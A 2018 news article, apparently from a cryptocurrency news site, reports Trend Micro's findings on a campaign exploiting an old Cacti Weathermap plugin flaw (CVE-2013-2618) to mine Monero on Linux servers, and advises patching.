íàçâàíèå

Cryptojacking Campaign Uses Five-Year-Old Vulnerability to Rake in Monero

Cryptojacking Campaign Uses Five-Year-Old Vulnerability to Rake in Monero

A nearly five-year-old vulnerability is reportedly being used to infect Linux servers with a crypto mining malware that’s allowing hackers to use them to mine privacy-centric cryptocurrency Monero (XMR), according to US-based cybersecurity firm Trend Micro.

Per the firm’s report, hackers are taking advantage of a vulnerability found in the Network Weathermap plugin for Cacti. The vulnerability being exploited is classified as CVE-2013-2618, and is allowing hackers to gain code execution ability on the underlying serves. This way, they’re able to install a customized version of XMRig, a legitimate, open-source Monero mining software.

Researchers detail that the attackers are able to guarantee maximum uptime through the vulnerability, by checking in on the mining malware every three minutes, in case anyone shuts down the system. To avoid detection, the attackers are instructing XMRig to perform discreetly, by limiting the maximum amount of CPU resources it will take advantage of to mine.

Notably a patch for the vulnerability has reportedly been available for about five years. Some users may still be unknowingly mining Monero for the hackers, despite being able to easily fix the problem. Trend Micro’s report reads:

The flaw was initially identified five years ago, in April 2013, in the Weathermap plugin. The open-source plugin is used by ISPs, internet exchanges, Fortune 500 companies, and telecom network to map network activity.

The cryptojacking campaign is mainly targeting publicly accessible x86-64 Linux servers throughout the world, with the most affected countries being Japan, Taiwan, China, the United States, and India.


Trend Micro researchers managed to discover two Monero wallets receiving the ill-gotten funds, and noted the campaign netted hackers 320 Monero (roughly $63,000) as of March 21. They noted, however, that this campaign is connected to one that used JenkinsMiner malware on Windows machines, and raked in at least $3 million worth of XMR.

Users can protect their machines by simply keeping their systems patched. Those running Cacti’s Network Weathermap plugin, researchers note, need to secure their data and keep it away from public servers. The firm’s report reads:

Notable cryptojacking victims include Tesla, and Starbucks as its Wi-Fi was found using people’s laptops to mine. A malware campaign also managed to hijack millions of Android devices to mine earlier this year.

Featured image from Shutterstock.

27.03.2018 / 05:50 80
Hackers Net Thousands in Monero Thanks to Vulnerability in Network Weathermap Plugin Hackers Net Thousands in Monero Thanks
U.S security firm Trend Micro has discovered a Monero crypto-mining attack targeting Linux Servers. The latest attack has been linked to an earlier
GhostMiner: Crypto-Jacking Software Removes Other Miners so It Can Mine Monero GhostMiner: Crypto-Jacking Software
Security researchers at Minerva Labs have uncovered a new strain of cryptocurrency mining malware, dubbed GhostMiner, which uses “fileless” malware
Hackers Target 400,000 Computers with Mining Malware Hackers Target 400,000 Computers with
More than 400,000 personal computers have been attacked in a large-scale attempt to distribute cryptocurrency mining malware. The hackers used
Microsoft Thwarts Massive Electroneum Mining Malware Campaign Microsoft Thwarts Massive Electroneum
Microsoft’s Windows Defender reportedly managed to prevent a massive Electroneum (ETN) mining campaign from spreading, according to the IT giant. Per
Researcher Finds Nearly 50,000 Websites Running Cryptocurrency Mining Malware Researcher Finds Nearly 50,000 Websites
Troy Mursch from Bad Packets Report recently conducted an investigation, in which he found that the ongoing cryptojacking trend has infected nearly
Hackers Are Stuffing Monero Ransom Notes Inside DDoS Attacks Hackers Are Stuffing Monero Ransom
Privacy-centric cryptocurrencies like Monero (XMR) are attractive to cybercriminals, who’ll seemingly do anything to get paid. Following a
Comments (0)
Add a comment
Comment on